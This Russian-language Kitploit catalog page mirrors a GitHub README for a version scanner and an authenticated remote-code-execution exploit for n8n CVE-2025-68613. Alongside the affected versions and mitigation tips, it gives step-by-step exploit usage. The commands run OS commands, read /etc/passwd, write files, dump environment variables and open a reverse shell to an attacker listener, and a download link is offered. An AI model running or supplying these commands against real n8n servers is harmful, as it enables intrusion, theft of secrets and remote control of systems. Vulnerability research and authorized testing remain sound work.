Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
n8n-cve-2025-68613 — n8n CVE-2025-68613 | Kitploit
Инструменты/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubgagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

n8n CVE-2025-68613

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2025-68613 – n8n: внедрение выражений (Expression Injection) → RCE

Python Security CVE Status

Этот инструментарий предоставляет сканер и PoC-эксплойт для критической уязвимости CVE-2025-68613 в n8n Workflow Automation Platform.

Этот репозиторий предоставляет скрипты сканера и PoC-эксплойта для критической CVE-2025-68613 уязвимости, затрагивающей n8n Workflow Automation Platform.


ПРЕДУПРЕЖДЕНИЕ

На индонезийском

Этот инструмент ТОЛЬКО для законного и авторизованного тестирования безопасности. Запрещается использовать этот инструмент на системах без разрешения владельца.

На английском

Этот инструмент ТОЛЬКО для авторизованного и легального тестирования безопасности. Неавторизованное использование незаконно и запрещено.


Обзор уязвимости

  • CVE ID : CVE-2025-68613
  • Уровень опасности : Критический
  • CVSS : 10.0
  • Тип : Внедрение выражений → удаленное выполнение кода (RCE)
  • Продукт : n8n Workflow Automation Platform

Уязвимые версии

  • 0.211.0 – 1.120.3
  • 1.121.0

Исправленные версии

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

Структура репозитория

root@kitploit:~
.
├── tot-scanner-2025-68613.py   # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py   # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md

Сканер (без эксплойта)

Сканер используется для:

  • обнаружения сервиса n8n
  • извлечения версии n8n
  • определения статуса уязвимости
  • без эксплойтации
  • поддержки вывода JSON

Сканер:

  • обнаруживает сервис n8n
  • извлекает версию n8n
  • определяет статус уязвимости
  • без эксплойтации
  • поддерживает вывод JSON

Сканер проверяет следующие эндпоинты:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

Зависимости / Требования

На индонезийском

Необходимые пакеты:

  • requests

Содержимое файла requirements.txt:

root@kitploit:~
requests>=2.28.0

На английском

Требуемые пакеты:

  • requests

Содержимое requirements.txt:

root@kitploit:~
requests>=2.28.0

Установка

root@kitploit:~
pip install -r requirements.txt

Использование сканера

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678

JSON-режим сканера

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

Пример вывода JSON сканера

root@kitploit:~
{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

Коды выхода сканера

КодЗначение
0Не уязвим
1Версия неизвестна
2Уязвим

Эксплойт PoC (авторизованный RCE)

Для этого эксплойта ТРЕБУЮТСЯ действительные учетные данные n8n
Требуется авторизованный доступ

Эксплойт работает следующим образом:

  1. Вход в n8n
  2. Создание workflow
  3. Вставка вредоносного выражения в узел Set
  4. Запуск workflow
  5. (Необязательно) Очистка workflow

Аргументы эксплойта


Поддерживаемые payload


Screen Capture

Примеры использования эксплойта

Информация о системе

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

Выполнение команды

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

Чтение файла

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

Запись файла

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

Реверс-шелл

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

Митигация

  • Обновить n8n до исправленных версий
  • Ограничить доступ к эндпоинтам /rest/*
  • Внедрить RBAC и строгую аутентификацию
  • Провести аудит неизвестных workflow

Отказ от ответственности

Этот проект предоставляется только для образовательного и авторизованного тестирования безопасности.
Автор не несет ответственности за неправомерное использование.


Темы GitHub

root@kitploit:~
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

Оставайтесь в рамках закона. Действуйте этично.

Скачать инструмент
АргументОбязательныйОписание
-u / --url✅Целевой URL n8n
-e / --email✅Email учетной записи n8n
-p / --password✅Пароль учетной записи n8n
--payload✅Тип payload
--command❌Команда ОС (cmd)
--file❌Путь к файлу (read/write)
--content❌Содержимое файла (write)
--lhost❌IP-адрес атакующего (revshell)
--lport❌Порт атакующего (revshell)
--verify-ssl❌Проверка SSL-сертификата
PayloadФункция
infoИнформация о системе
cmdВыполнение команд
envДамп окружения
readЧтение файла
writeЗапись файла
revshellРеверс-шелл